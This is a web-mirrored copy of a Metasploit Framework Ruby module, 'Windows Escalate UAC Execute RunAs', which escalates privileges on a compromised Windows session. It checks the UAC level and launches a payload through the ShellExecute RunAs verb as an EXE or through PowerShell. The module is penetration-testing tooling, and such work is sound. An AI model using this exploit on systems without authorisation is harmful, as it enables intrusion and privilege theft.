Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/ask.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = ExcellentRanking
8
9
include Post::Windows::Priv
10
include Post::Windows::Runas
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Windows Escalate UAC Execute RunAs',
17
'Description' => %q{
18
This module will attempt to elevate execution level using
19
the ShellExecute undocumented RunAs flag to bypass low
20
UAC settings.
21
},
22
'License' => MSF_LICENSE,
23
'Author' => [
24
'mubix', # Original technique
25
'b00stfr3ak' # Added powershell option
26
],
27
'Platform' => ['win'],
28
'SessionTypes' => ['meterpreter'],
29
'Targets' => [['Windows', {}]],
30
'DefaultTarget' => 0,
31
'DisclosureDate' => '2012-01-03',
32
'Notes' => {
33
'Reliability' => UNKNOWN_RELIABILITY,
34
'Stability' => UNKNOWN_STABILITY,
35
'SideEffects' => UNKNOWN_SIDE_EFFECTS
36
}
37
)
38
)
39
40
register_options([
41
OptString.new('FILENAME', [false, 'File name on disk']),
42
OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
43
OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),
44
])
45
end
46
47
def exploit
48
if is_uac_enabled?
49
print_status 'UAC is Enabled, checking level...'
50
case get_uac_level
51
when UAC_NO_PROMPT
52
print_good 'UAC is not enabled, no prompt for the user'
53
else
54
print_status "The user will be prompted, wait for them to click 'Ok'"
55
end
56
else
57
print_good 'UAC is not enabled, no prompt for the user'
58
end
59
60
case datastore['TECHNIQUE']
61
when 'EXE'
62
shell_execute_exe(datastore['FILENAME'], datastore['PATH'])
63
when 'PSH'
64
shell_execute_psh
65
end
66
end
67
end
68
69